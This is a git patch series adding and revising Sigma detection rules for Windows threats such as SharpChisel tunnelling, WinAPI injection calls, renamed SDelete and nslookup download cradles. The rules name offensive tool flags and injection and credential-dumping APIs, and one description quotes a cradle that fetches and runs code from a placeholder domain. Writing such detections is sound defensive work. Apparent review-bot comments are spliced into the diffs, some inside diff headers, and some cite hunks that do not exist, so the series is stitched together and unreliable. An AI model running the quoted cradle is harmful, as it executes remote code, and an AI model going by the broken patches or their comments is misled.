index 000000000..a28f7d2c3
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
@@ -0,0 +1,32 @@
+title: SharpChisel Usage
+id: cf93e05e-d798-4d9e-b522-b0248dc61eaf
+status: experimental
+description: Detects usage of the Sharp Chisel via the commandline arguments
+author: Nasreddine Bencherchali
+references:
+ - https://github.com/shantanu561993/SharpChisel
+ - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/
+date: 2022/09/05
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_img:
+ Image|endswith: '\SharpChisel.exe'
+ selection_client_server:
+ CommandLine|contains:
+ - 'exe client '
+ - 'exe server '
+ selection_flags:
+ CommandLine|contains:
+ - ' --socks5'
+ - ' --reverse'
+ - ' r:'
+ - ':127.0.0.1:'
+ condition: 1 of selection_*
+falsepositives:
+ - Some flalse positives may occure with other tools with similar commandlines
+level: medium
+tags:
+ - attack.command_and_control
+ - attack.t1090.001
From b70e42b2068898c2f3d5911a9289210d35965119 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Tue, 6 Sep 2022 09:14:03 +0200
Subject: [PATCH 13/73] Create proc_creation_win_inline_win_api_access.yml
---
 ...roc_creation_win_inline_win_api_access.yml | 70 +++++++++++++++++++
 1 file changed, 70 insertions(+)
 create mode 100644 rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
new file mode 100644
index 000000000..3b276add6
--- /dev/null
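Review bot: With `condition: 1 of selection_*`, `selection_flags` alone is enough to fire, and `':127.0.0.1:'` and `' r:'` are fragments present in many ordinary command lines (any `host:port` argument pointed at a local service), so this rule will alert on unrelated processes at medium level. Tying the flag terms to the client/server term keeps the image match standalone while making the generic fragments meaningful, e.g. `condition: selection_img or (selection_client_server and selection_flags)`. The falsepositives entry also carries typos: `Some flalse positives may occure` should read `Some false positives may occur`.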
+++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
@@ -0,0 +1,70 @@
+title: Accessing WinAPI Via CommandLine
+id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702
+related:
+ - id: 03d83090-8cba-44a0-b02f-0b756a050306
+ type: derived
+status: experimental
+description: Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec
+author: Nasreddine Bencherchali
+date: 2022/09/06
+references:
+ - https://twitter.com/m417z/status/1566674631788007425
+tags:
+ - attack.execution
+ - attack.t1106
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|contains:
+ - 'WaitForSingleObject'
+ - 'QueueUserApc'
+ - 'RtlCreateUserThread'
+ - 'OpenProcess'
+ - 'VirtualAlloc'
+ - 'VirtualFree'
+ - 'WriteProcessMemory'
+ - 'CreateUserThread'
+ - 'CloseHandle'
+ - 'GetDelegateForFunctionPointer'
+ - 'CreateThread'
+ - 'memcpy'
+ - 'LoadLibrary'
+ - 'GetModuleHandle'
+ - 'GetProcAddress'
+ - 'VirtualProtect'
+ - 'FreeLibrary'
+ - 'ReadProcessMemory'
+ - 'CreateRemoteThread'
+ - 'AdjustTokenPrivileges'
+ - 'WriteInt32'
+ - 'OpenThreadToken'
+ - 'PtrToString'
+ - 'FreeHGlobal'
+ - 'ZeroFreeGlobalAllocUnicode'
+ - 'OpenProcessToken'
+ - 'GetTokenInformation'
+ - 'SetThreadToken'
+ - 'ImpersonateLoggedOnUser'
+ - 'RevertToSelf'
+ - 'GetLogonSessionData'
+ - 'CreateProcessWithToken'
+ - 'DuplicateTokenEx'
+ - 'OpenWindowStation'
+ - 'OpenDesktop'
+ - 'MiniDumpWriteDump'
+ - 'AddSecurityPackage'
+ - 'EnumerateSecurityPackages'
+ - 'GetProcessHandle'
+ - 'DangerousGetHandle'
+ - 'kernel32'
+ - 'Advapi32'
+ - 'msvcrt'
+ - 'ntdll'
+ - 'user32' # FP with chocolatey
+ - 'secur32'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
From 65cc3b2dc8d2cd196dd0b76a21efb0a39128a7a6 Mon Sep 17 00:00:00 2001
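Review bot: Several entries in `CommandLine|contains` are bare module or API names (`kernel32`, `Advapi32`, `msvcrt`, `ntdll`, `user32`, `secur32`, `LoadLibrary`, `CloseHandle`, `memcpy`) that occur in legitimate command lines, as the inline `# FP with chocolatey` comment on `user32` already concedes, yet the rule is `level: high` with a bare `selection` condition and `falsepositives: - Unknown`. Since the description ties the behaviour to the `winapiexec` tool, anchoring on that tool's image or original file name in a second selection, or requiring two or more tokens via `CommandLine|contains|all`, would keep the high level defensible; otherwise `level: medium` and a populated `falsepositives` list are the honest setting. I cannot confirm winapiexec's binary name from this page, so any image term would need to be verified before adding.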
From: Florian Roth
Date: Tue, 6 Sep 2022 09:17:35 +0200
Subject: [PATCH 14/73] Update file_event_win_susp_executable_creation.yml
---
 .../file_event/file_event_win_susp_executable_creation.yml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/rules/windows/file_event/file_event_win_susp_executable_creation.yml b/rules/windows/file_event/file_event_win_susp_executable_creation.yml
index f2da7f880..3444fe185 100644
--- a/rules/windows/file_event/file_event_win_susp_executable_creation.yml
+++ b/rules/windows/file_event/file_event_win_susp_executable_creation.yml
@@ -1,9 +1,10 @@
 title: Suspicious Executable File Creation
 id: 74babdd6-a758-4549-9632-26535279e654
 status: experimental
-description: Detect creation of suspicious executable file name
+description: Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
 author: frack113
 references:
+ - https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
 - https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/
 date: 2022/09/05
 logsource:
@@ -27,4 +28,4 @@ falsepositives:
 level: high
 tags:
 - attack.defense_evasion
- - attack.t1564
\ No newline at end of file
+ - attack.t1564
From c81f87c3331212b801c989e54b05e8f9d0c0bd95 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Tue, 6 Sep 2022 09:39:45 +0200
Subject: [PATCH 15/73] refactor: renamed sdelete and increased level
---
 .../proc_creation_win_renamed_sdelete.yml | 31 +++++++++++++++++++
 .../proc_creation_win_sdelete.yml | 8 ++---
 2 files changed, 35 insertions(+), 4 deletions(-)
 create mode 100644 rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml
new file mode 100644
index 000000000..b7aca4c24
--- /dev/null
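Review bot: The new description says some filenames target unquoted service paths, but `selection_folder` in the part of the rule outside this hunk lists only `C:\$Recycle.Bin.exe`, `C:\Documents and Settings.exe`, `C:\MSOCache.exe`, `C:\Recovery.exe` and `C:\PerfLogs.exe`; the canonical unquoted-path artifact `C:\Program.exe` (the truncation of `C:\Program Files\...`) is not among them, so either add it or narrow the description to what the list covers. Those entries are exact `TargetFilename` matches, so the same names on any other drive letter are also missed; `TargetFilename|endswith` on the `\<name>.exe` part would cover them if that breadth is intended. The detection block itself starts outside this hunk.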
+++ b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml
@@ -0,0 +1,31 @@
+title: Renamed Sysinternals Sdelete Usage
+id: c1d867fe-8d95-4487-aab4-e53f2d339f90
+description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
+status: experimental
+author: Florian Roth
+date: 2022/09/06
+references:
+ - https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
+tags:
+ - attack.impact
+ - attack.t1485
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ OriginalFileName: 'sdelete.exe'
+ filter:
+ Image|endswith:
+ - '\sdelete.exe'
+ - '\sdelete64.exe'
+ condition: selection and not filter
+fields:
+ - ComputerName
+ - User
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - System administrator usage
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_sdelete.yml b/rules/windows/process_creation/proc_creation_win_sdelete.yml
index b235477bd..0846681d4 100644
--- a/rules/windows/process_creation/proc_creation_win_sdelete.yml
+++ b/rules/windows/process_creation/proc_creation_win_sdelete.yml
@@ -3,8 +3,8 @@ id: a4824fca-976f-4964-b334-0621379e84c4
 status: experimental
 author: frack113
 date: 2021/06/03
-modified: 2022/08/13
-description: Use of SDelete to erase a file not the free space
+modified: 2022/09/06
+description: Detects the use of SDelete to erase a file not the free space
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
 tags:
@@ -29,5 +29,5 @@ fields:
 - CommandLine
 - ParentCommandLine
 falsepositives:
- - System administrator Usage
-level: medium
+ - System administrator usage
+level: high
From 4cdd5a5fecca2bcb0ae0267d515b410b81357507 Mon Sep 17 00:00:00 2001
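Review bot: The `filter` in the new renamed-sdelete rule only whitelists the two file names `\sdelete.exe` and `\sdelete64.exe`, so every other legitimate file name that carries `OriginalFileName: 'sdelete.exe'` fires as "renamed"; if the Sysinternals suite ships further builds under other names (an ARM64 variant, for instance) those should be added to the list after checking their version resource, and the assumption that all builds report `sdelete.exe` as OriginalFileName is worth confirming against a sample event. The `falsepositives` entry `System administrator usage` describes the un-renamed tool and does not fit a rule whose premise is that renaming is abnormal; `- Legitimate deployments that ship a renamed copy of the tool` would describe the real residual case. A `related` entry of `type: similar` pointing at the existing SDelete rule in the second hunk would also help triage, since both rules will often fire on the same event.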
From: Florian Roth
Date: Tue, 6 Sep 2022 10:53:10 +0200
Subject: [PATCH 16/73] Update proc_creation_win_nslookup_pwsh_download_cradle.yml
---
 ...tion_win_nslookup_pwsh_download_cradle.yml | 20 +++++++++++--------
 1 file changed, 12 insertions(+), 8 deletions(-)
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
index da49a404c..17d390701 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
@@ -1,18 +1,22 @@
 title: Nslookup PwSh Download Cradle
+id: 72671447-4352-4413-bb91-b85569687135
+status: experimental
+description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
 author: Zach Mathis (@yamatosecurity)
 date: 2022/09/06
-description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] '
-id: 72671447-4352-4413-bb91-b85569687135
-level: medium
-status: experimental
+tags:
+ - attack.command_and_control
+ - attack.t1105
+ - attack.t1071.004
+references:
+ - https://twitter.com/alh4zr3d/status/1566489367232651264
 logsource:
 category: process_creation
 product: windows
 detection:
 selection:
- ParentImage|contains: powershell
+ ParentImage|endswith: '\powershell.exe'
 Image|contains: nslookup
- CommandLine|contains: txt
+ CommandLine|contains: '=txt '
 condition: selection
-references:
- - https://twitter.com/alh4zr3d/status/1566489367232651264
\ No newline at end of file
+level: medium
From 70f9a16149ff306bb43e473f46823232f105c360 Mon Sep 17 00:00:00 2001
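Review bot: This rule and `proc_creation_win_nslookup_poweshell_download.yml` (hunks at L22 and L27 of this series) now implement the same logic, PowerShell parent, nslookup child, TXT query on the command line, yet neither rule references the other; a `related:` entry with `type: similar` naming the other rule's id should be added to one of them, or the two merged, so the duplicate alerts can be correlated. Within this hunk, `Image|contains: nslookup` is looser than the sibling rule's `'\nslookup.exe'` and would be better as `Image|endswith: '\nslookup.exe'`, and `CommandLine|contains: '=txt '` requires a trailing space, so a query where the type argument is the last token on the line is not matched; the sibling rule's `' -q=txt '` has the same property. The new `description` still carries the example command line from the old wording; that is fine for analysts, but `ParentImage|endswith: '\powershell.exe'` now excludes `pwsh.exe`, which the title ("PwSh") suggests was in scope.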
From: Tim Shelton
Date: Tue, 6 Sep 2022 13:11:37 +0000
Subject: [PATCH 17/73] FIX: fixes missing string indicator. does not pass validate() check inside base.py
---
 rules/windows/file_change/file_change_win_2022_timestomping.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml
index 9becf4856..cfdf05658 100644
--- a/rules/windows/file_change/file_change_win_2022_timestomping.yml
+++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml
@@ -23,7 +23,7 @@ detection:
 selection2:
 PreviousCreationUtcTime|startswith: '202'
 filter2:
- CreationUtcTime|startswith: 202
+ CreationUtcTime|startswith: '202'
 gen_filter_updates:
 - Image:
 - 'C:\Windows\system32\ProvTool.exe'
From 7abe4a7c505c5883205602f7eaf31257236f8567 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Tue, 6 Sep 2022 16:42:53 +0200
Subject: [PATCH 18/73] Update proc_creation_win_nslookup_poweshell_download.yml
---
 .../proc_creation_win_nslookup_poweshell_download.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
index 09f23188b..7466ddbef 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
@@ -19,7 +19,7 @@ detection:
 ParentImage|endswith: '\powershell.exe'
 Image|contains: '\nslookup.exe'
 CommandLine|contains: ' -q=txt '
- condition: 1 of slection_*
+ condition: 1 of selection_*
 falsepositives:
 - Unlikely
 level: high
From 513922de9cde6d89031693f81946d538cf1f20a7 Mon Sep 17 00:00:00 2001
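Review bot: Both hunks on this line change a rule's detection section without bumping `modified`, whereas the other rule edits in this series (L23, L25, L30, L32, L33, L35) do; the same omission recurs in the hunks at L24, L26–L27 and L37. Consumers that sync rules by `modified` will not pick these fixes up, so each touched rule should get `modified: 2022/09/06` (or the respective commit date) next to its `date` line. The second hunk is also notable because `1 of slection_*` references a selection pattern with no matches, which a `1 of` condition resolves to an empty set rather than an error on some backends; it would be worth checking whether the repository's rule tests flag unresolved `1 of`/`all of` patterns so this class of typo fails CI instead of shipping.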
From: phantinuss <79651203+phantinuss@users.noreply.github.com>
Date: Tue, 6 Sep 2022 16:52:12 +0200
Subject: [PATCH 19/73] fix: new FP with Onedrive
---
 ...gistry_set_asep_reg_keys_modification_currentversion.yml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
index bf9e046d0..ad5a53caa 100644
--- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
+++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
@@ -12,7 +12,7 @@ references:
 - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
 - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
 date: 2019/10/25
-modified: 2022/08/23
+modified: 2022/09/06
 logsource:
 category: registry_set
 product: windows
@@ -98,7 +98,9 @@ detection:
 - '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}'
 - '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}'
 filter_onedrive:
- Details|startswith: 'C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\'
+ Details|startswith:
+ - 'C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\'
+ - 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\'
 Details|contains: '\AppData\Local\Microsoft\OneDrive\'
 filter_python:
 TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}'
From 4f69b7058ff2b3b450485a83488153fbfe4b22e0 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Tue, 6 Sep 2022 16:57:55 +0200
Subject: [PATCH 20/73] Update proc_creation_win_inline_win_api_access.yml
---
 .../proc_creation_win_inline_win_api_access.yml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
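Review bot: The widened `filter_onedrive` keys only on the `Details` prefix and a path substring, so any RunOnce value that starts with `cmd.exe /q /c del /q "C:\Users\` and mentions the OneDrive folder anywhere later in the command is excluded from an autostart-persistence rule, regardless of which process wrote it or what follows the path. The filter would be considerably tighter if it also constrained the writing process; if the event behind this FP shows the OneDrive installer as the writer (check the `Image` field of that event), add `Image|endswith: '\OneDriveSetup.exe'` to the filter, otherwise at least pin the end of the value with a `Details|endswith` matching the observed OneDrive path suffix. A short comment on the filter recording which OneDrive component produces these values, e.g. `# OneDrive updater cleans up its old install dir via RunOnce`, would help the next person who has to widen it again.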
diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
index 3b276add6..695e757d0 100644
--- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
+++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
@@ -64,7 +64,10 @@ detection:
 - 'ntdll'
 - 'user32' # FP with chocolatey
 - 'secur32'
- condition: selection
+ filter_defender:
+ Image|endswith: '\MpCmdRun.exe'
+ CommandLine|contains: ' -GetLoadLibraryWAddress32'
+ condition: selection and not 1 of filter_*
 falsepositives:
 - Unknown
 level: high
From 1e2a894c2e068977bca501973693c0434c521690 Mon Sep 17 00:00:00 2001
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com>
Date: Tue, 6 Sep 2022 17:19:46 +0200
Subject: [PATCH 21/73] Update posh_ps_adrecon_execution.yml
---
 .../powershell_script/posh_ps_adrecon_execution.yml | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml b/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml
index 799b4e99c..ef08b024f 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml
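Review bot: `filter_defender` exempts a process purely on its file name (`Image|endswith: '\MpCmdRun.exe'`) combined with a command-line substring, and name-only exclusions are the weakest kind of allow-list in a rule that otherwise keys on command-line content; if the backends in use expose it, anchoring the exclusion on the expected install location (`Image|startswith` for the Defender platform directory) or on `OriginalFileName` makes the exemption harder to satisfy by accident. The `falsepositives` block still reads `Unknown` even though this hunk documents a concrete one; `- Windows Defender MpCmdRun.exe self-checks (filtered)` belongs there. The enclosing `detection` block starts above this hunk, and the rule's `modified` date is not bumped by this change.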
@@ -1,9 +1,9 @@
 title: PowerShell ADRecon Execution
 id: bf72941a-cba0-41ea-b18c-9aca3925690d
 status: experimental
-description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
+description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
 references:
- - https://github.com/sense-of-security/ADRecon
+ - https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1
 - https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319
 tags:
 - attack.discovery
@@ -11,7 +11,7 @@ tags:
 - attack.t1059.001
 author: Bhabesh Raj
 date: 2021/07/16
-modified: 2021/10/16
+modified: 2022/09/06
 logsource:
 product: windows
 category: ps_script
@@ -20,6 +20,8 @@ detection:
 selection:
 ScriptBlockText|contains:
 - 'Function Get-ADRExcelComOb'
+ - 'Get-ADRGPO'
+ - 'Get-ADRDomainController'
 - 'ADRecon-Report.xlsx' #Default
 condition: selection
 falsepositives:
From f952c02a5fd68744b6b10f45e5b1c9fc048fdfc1 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Tue, 6 Sep 2022 22:59:24 +0200
Subject: [PATCH 22/73] Update after review
---
 ...roc_creation_win_inline_win_api_access.yml | 95 +++++++++----------
 ...eation_win_nslookup_poweshell_download.yml | 4 +-
 2 files changed, 49 insertions(+), 50 deletions(-)
diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
index 695e757d0..eee3f01c6 100644
--- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
+++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
@@ -18,55 +18,52 @@ logsource:
 detection:
 selection:
 CommandLine|contains:
- - 'WaitForSingleObject'
- - 'QueueUserApc'
- - 'RtlCreateUserThread'
- - 'OpenProcess'
- - 'VirtualAlloc'
- - 'VirtualFree'
- - 'WriteProcessMemory'
- - 'CreateUserThread'
- - 'CloseHandle'
- - 'GetDelegateForFunctionPointer'
- - 'CreateThread'
- - 'memcpy'
- - 'LoadLibrary'
- - 'GetModuleHandle'
- - 'GetProcAddress'
- - 'VirtualProtect'
- - 'FreeLibrary'
- - 'ReadProcessMemory'
- - 'CreateRemoteThread'
- - 'AdjustTokenPrivileges'
- - 'WriteInt32'
- - 'OpenThreadToken'
- - 'PtrToString'
- - 'FreeHGlobal'
- - 'ZeroFreeGlobalAllocUnicode'
- - 'OpenProcessToken'
- - 'GetTokenInformation'
- - 'SetThreadToken'
- - 'ImpersonateLoggedOnUser'
- - 'RevertToSelf'
- - 'GetLogonSessionData'
- - 'CreateProcessWithToken'
- - 'DuplicateTokenEx'
- - 'OpenWindowStation'
- - 'OpenDesktop'
- - 'MiniDumpWriteDump'
- - 'AddSecurityPackage'
- - 'EnumerateSecurityPackages'
- - 'GetProcessHandle'
- - 'DangerousGetHandle'
- - 'kernel32'
- - 'Advapi32'
- - 'msvcrt'
- - 'ntdll'
- - 'user32' # FP with chocolatey
- - 'secur32'
- filter_defender:
- Image|endswith: '\MpCmdRun.exe'
- CommandLine|contains: ' -GetLoadLibraryWAddress32'
+ - ' WaitForSingleObject '
+ - ' QueueUserApc '
+ - ' RtlCreateUserThread '
+ - ' OpenProcess '
+ - ' VirtualAlloc '
+ - ' VirtualFree '
+ - ' WriteProcessMemory '
+ - ' CreateUserThread '
+ - ' CloseHandle '
+ - ' GetDelegateForFunctionPointer '
+ - ' CreateThread '
+ - ' memcpy '
+ - ' LoadLibrary '
+ - ' GetModuleHandle '
+ - ' GetProcAddress '
+ - ' VirtualProtect '
+ - ' FreeLibrary '
+ - ' ReadProcessMemory '
+ - ' CreateRemoteThread '
+ - ' AdjustTokenPrivileges '
+ - ' WriteInt32 '
+ - ' OpenThreadToken '
+ - ' PtrToString '
+ - ' FreeHGlobal '
+ - ' ZeroFreeGlobalAllocUnicode '
+ - ' OpenProcessToken '
+ - ' GetTokenInformation '
+ - ' SetThreadToken '
+ - ' ImpersonateLoggedOnUser '
+ - ' RevertToSelf '
+ - ' GetLogonSessionData '
+ - ' CreateProcessWithToken '
+ - ' 
DuplicateTokenEx '
+ - ' OpenWindowStation '
+ - ' OpenDesktop '
+ - ' MiniDumpWriteDump '
+ - ' AddSecurityPackage '
+ - ' EnumerateSecurityPackages '
+ - ' GetProcessHandle '
+ - ' DangerousGetHandle '
+ - ' kernel32 '
+ - ' Advapi32 '
+ - ' msvcrt '
+ - ' ntdll '
+ - ' user32 ' # FP with chocolatey
+ - ' secur32 '
 condition: selection and not 1 of filter_*
 falsepositives:
 - Unknown
diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
index 7466ddbef..5d1d84e07 100644
--- a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml
@@ -18,7 +18,9 @@ detection:
 selection_img:
 ParentImage|endswith: '\powershell.exe'
 Image|contains: '\nslookup.exe'
- CommandLine|contains: ' -q=txt '
+ CommandLine|contains:
+ - ' -q=txt '
+ - ' -querytype=txt '
 condition: 1 of selection_*
 falsepositives:
 - Unlikely
From 62f5b327faf02f0bad0e070752e03a018e1c52a7 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Tue, 6 Sep 2022 23:04:48 +0200
Subject: [PATCH 23/73] Update proc_creation_win_inline_win_api_access.yml
---
 .../proc_creation_win_inline_win_api_access.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
index eee3f01c6..4abb41462 100644
--- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
+++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml
@@ -64,7 +64,7 @@ detection:
 - ' ntdll '
 - ' user32 ' # FP with chocolatey
 - ' secur32 '
- condition: selection and not 1 of filter_*
+ condition: selection
 falsepositives:
 - Unknown
 level: high
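Review bot: The hunk removes `filter_defender` but leaves `condition: selection and not 1 of filter_*` as context, so after this commit the condition references a selection-name pattern that matches nothing; the following patch on this line (`condition: selection`) repairs it, but the intermediate revision should not have been committed in that state, and the same fixed-up `condition` is reached only by that later hunk. Padding every keyword with a space on both sides (`' LoadLibrary '`, `' kernel32 '`) reduces the noise from `'kernel32'`-style substrings, but it also means a name immediately followed by a quote, comma or parenthesis no longer matches, which should be stated in the rule, e.g. a comment `# keywords are space-delimited to avoid matching file names and URLs; quoted or comma-separated API names are intentionally not covered`. Dropping the Defender exclusion is consistent with the padding (`-GetLoadLibraryWAddress32` no longer matches `' LoadLibrary '`), but `modified` is still not bumped in either hunk. The enclosing `detection` block starts above this hunk.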
From dc90e08f3e1a63ed6d24435e702f307cca3ef39c Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 7 Sep 2022 12:02:09 +0200
Subject: [PATCH 24/73] More updates
---
 .../create_stream_hash_susp_ip_domains.yml | 39 +++++++++++++++
 ..._creation_mavinject_process_injection.yml} | 35 ++++++++------
 .../proc_creation_win_mavinject_proc_inj.yml | 24 ----------
 ...registry_event_silentprocessexit_lsass.yml | 14 ++++--
 .../registry_set_globalflags_persistence.yml | 48 +++++++++----------
 .../registry_set_silentprocessexit.yml | 2 +-
 6 files changed, 93 insertions(+), 69 deletions(-)
 create mode 100644 rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
 rename rules/windows/process_creation/{proc_creation_win_creation_mavinject_dll.yml => proc_creation_win_creation_mavinject_process_injection.yml} (51%)
 delete mode 100644 rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml
diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
new file mode 100644
index 000000000..c68a9ce6b
--- /dev/null
+++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
@@ -0,0 +1,39 @@
+title: Unusual File Download from File Sharing Domain
+id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
+status: experimental
+description: Detects the download of suspicious file type from URLs with IP
+author: Nasreddine Bencherchali
+references:
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015
+date: 2022/09/07
+logsource:
+ product: windows
+ category: create_stream_hash
+detection:
+ selection_domain:
+ Contents|contains:
+ - '1.'
+ - '2.'
+ - '3.'
+ - '4.'
+ - '5.'
+ - '6.'
+ - '7.'
+ - '8.'
+ - '9.'
+ selection_extension:
+ TargetFilename|contains:
+ - '.ps1:Zone'
+ - '.bat:Zone'
+ - '.exe:Zone'
+ - '.vbe:Zone'
+ - '.vbs:Zone'
+ - '.dll:Zone'
+ - ':Zone' # No extension
+ condition: all of selection*
+falsepositives:
+ - Unknown
+level: high
+tags:
+ - attack.defense_evasion
+ - attack.t1564.004
diff --git a/rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml b/rules/windows/process_creation/proc_creation_win_creation_mavinject_process_injection.yml
similarity index 51%
rename from rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml
rename to rules/windows/process_creation/proc_creation_win_creation_mavinject_process_injection.yml
index 0a098bb3f..07cd5caed 100644
--- a/rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml
+++ b/rules/windows/process_creation/proc_creation_win_creation_mavinject_process_injection.yml
